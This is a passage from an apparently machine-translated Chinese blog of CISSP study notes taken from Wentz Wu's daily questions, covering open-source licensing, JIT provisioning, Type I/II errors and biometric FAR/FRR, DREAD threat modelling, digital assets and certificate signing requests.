開源軟體 (Open-source software : OSS ) 是 根據許可發布的計算機軟體,在該許可下 , 版權所有 者授予用戶使用、研究、更改和 分發軟體 及其 源代碼的權利, 以用於任何目的。
資料來源:維基百科

費用(Costs)
它也不是免費軟體,儘管大多數開源軟體都可以免費獲得。一些供應商許可軟體並開放源代碼並允許客戶修改它們。有些人將此稱為可用源或共享源,可以將其廣泛視為開源的一部分。

後門(Back Doors)
開源軟體通常被認為比專有軟體更安全,但它並非沒有風險。例如,中國黑客以帶有 RedXOR 後門的 Linux 系統為目標,或者華為(中國製造商)嘗試向 Linux 插入後門/漏洞

公共領域(The Public Domain)
“公共領域”一詞是指不受版權、商標或專利法等知識產權法保護的創意材料。公眾擁有這些作品,而不是個人作者或藝術家。任何人都可以在未經許可的情況下使用公共領域的作品,但沒有人可以擁有它。
資料來源:斯坦福

參考
歡迎來到公共領域
與商業模式相關的開源許可證選擇

資料來源: Wentz Wu QOTD-20210731

分類
CISSP

及時生產 ( just-in-time)

及時生產 (JIT) 一詞出現在豐田生產系統中。JIT 是一種庫存管理策略,可根據需要或按需訂購庫存。在安全方面,許多活動可以及時進行——例如,身份提供、證書註冊、授權、權限提升等。
促進身份驗證以便用戶可以登錄一次並跨系統訪問資源是單點登錄 (SSO) 的描述。它與及時生產的概念無關。

參考
AWS 即時預置
AWS 即時註冊
什麼是即時 (JIT) 供應?
SAML SSO 與即時 (JIT) 供應之間的區別
什麼是即時 (JIT) 特權訪問?
什麼是即時特權訪問?
及時生產 – 豐田生產系統指南
及時生產 (JIT) 庫存管理

資料來源: Wentz Wu QOTD-20210728

分類
CISSP

樣本指紋與模型庫中的模板匹配(The sample fingerprint matches the template in the model repository)

https://ithelp.ithome.com.tw/upload/images/20210823/20132160Wwq8awYRWE.jpg
-零假設和替代假設(來源:PrepNuggets)
原假設和替代假設(Null and Alternative Hypotheses)
零假設是假設與正常狀態為零或沒有偏差。由於證明假設很困難,我們通常會找到反對原假設的證據並接受替代假設,而不是直接證明替代假設為真。因此,原假設和備擇假設可以寫成如下:
. 替代假設:樣本指紋與模型庫中的模板不匹配
. 零假設:樣本指紋與模型庫中的模板匹配

錯誤接受率 (FAR) 和錯誤拒絕率 (FRR) 等與生物識別相關的術語是常用的,並且對於通信非常有效。人們或書籍將 FAR/FRR 與型一和 型二錯誤(用於統計假設)或假陽性/陰性(用於二元分類)相關聯的情況並不少見。我寫這個問題是為了強調當我們談論 I/II 類錯誤時零假設的重要性。

型一和 型二錯誤(Type I and Type II Errors)
在統計學中,我們通常不會只提出一個需要足夠證據來證明的假設。相反,我們接受備擇假設,因為我們拒絕了基於具有預定義顯著性水平(例如,5%)的反對原假設的證據。
統計假設檢驗的決定是是否拒絕零假設。但是,有些決定可能是錯誤的,可分為以下幾類:
. 第一類錯誤:我們拒絕原假設,這是真的。(拒絕正常情況)
. 第二類錯誤:我們未能拒絕原假設,這是錯誤的。(接受異常情況)

假陽性和假陰性(False Positive and False Negative)
當談到機器學習中的二元分類時,模型被訓練為基於一小部分樣本數據的二元分類器,通過標籤對實例/案例進行分類(例如,0/1、垃圾郵件/非垃圾郵件、武器/無武器) .
在實現基於異常檢測的系統中,它可以使用 Imposter/No Imposter 進行分類,如下所示:
. “冒名頂替者”是正面類的標籤。
. “無冒名頂替者”是負類的標籤。

誤報意味著識別/檢測到冒名頂替者,但決定是錯誤的。假陰性意味著沒有識別/檢測到冒名頂替者,而且該決定是錯誤的。人們通常會將假陽性與 I 類錯誤聯繫起來,將假陰性與 II 類錯誤聯繫起來,即使它們在使用不同技術的上下文中使用。Li 的論文很好地將統計假設檢驗與機器學習二元分類進行了比較。
https://ithelp.ithome.com.tw/upload/images/20210823/20132160R88nv16nH8.jpg
-假設檢驗和二元分類(來源:ScienceDirect

參考
統計假設檢驗與機器學習二元分類:區別和指南
統計學中的假設檢驗簡介 – 假設檢驗統計問題和示例
假設檢驗簡介
機器學習中的 4 種分類任務
分類:真與假和正與負

資料來源: Wentz Wu QOTD-20210727

分類
CISSP

威脅建模-DREAD

https://ithelp.ithome.com.tw/upload/images/20210819/201321608A0CAFwjtC.jpg
-Stride、VAST、Trike 等:哪種威脅建模方法適合您的組織?

風險敞口是根據可能性、後果和其他風險因素用貨幣價值、分數或尺度值評估的潛在損失的量度。風險暴露通常被簡化為後果的概率和幅度的乘積;即預期價值或預期暴露。例如,假設有 50% 的風險可能導致 1,000,000 美元的財務損失,則風險敞口為 500,000 美元。
DREAD 是損害、可再現性、可利用性、受影響用戶和可發現性的首字母縮寫詞。首字母縮略詞的每個字母代表可能性或影響。它們被一起考慮以評估風險敞口。
STRIDE 是一種風險分類工具,具有預定義的類別:欺騙、篡改、否認、信息披露、拒絕服務特權提升。它不分析威脅的可能性或影響。
https://ithelp.ithome.com.tw/upload/images/20210819/20132160LrOqIyt7WU.jpg
-威脅建模(來源:CSSLP CBK)
https://ithelp.ithome.com.tw/upload/images/20210819/20132160YsD3ZCXeIX.jpg

參考
Stride、VAST、Trike 等:哪種威脅建模方法適合您的組織?

資料來源: Wentz Wu QOTD-20210726

分類
Information Security

數位資產(digital asset)

數位資產(英語:digital asset)是經過二進位編碼的任何被授權使用的文字媒體資源,包括文字內容、圖片多媒體

數位資產包括網站及其內容、域名應用軟體代碼、電子文件、圖片內容、媒體內容、電子貨幣電子郵件、遊戲帳號、帳號及其內容、社群網路帳戶及其關係和內容、雲端服務帳戶及其資料等。從經濟學角度來說,數位資產是企業擁有或控制的,以資料形態存在的,在日常活動中生產、經營或持有待售的可變資產,數位資產屬於網路財產。

資料來源:https://zh.wikipedia.org/wiki/%E6%95%B0%E5%AD%97%E8%B5%84%E4%BA%A7

分類
CISSP

證書籤名請求 (CSR)

您應該生成公鑰和私鑰的密鑰對,並將私鑰保密。CSR 包含有關主題的信息、公鑰、由私鑰簽名以避免欺騙 CSR 的簽名以及其他信息。“CSR 最常見的格式是 PKCS #10 規範;另一個是由某些 Web 瀏覽器生成的簽名公鑰和質詢 SPKAC 格式。” (維基百科
證書籤名請求 (CSR) 完全由您自己創建並提交給註冊機構 (RA)。RA 不可能在您的 CSR 上添加時間戳。
https://ithelp.ithome.com.tw/upload/images/20210818/20132160IPD7TvlXHd.jpg
-openssl req -text -in file.csr(來源:Hallo zusammen)

參考
證書籤名請求
如何查看和解碼 CSR
證書籤名請求 (CSR) 示例

資料來源: Wentz Wu QOTD-20210725

分類
CISSP

CIA安全目標

曾就「資訊本身的破壞」和「資訊或資訊系統獲取或使用中斷」進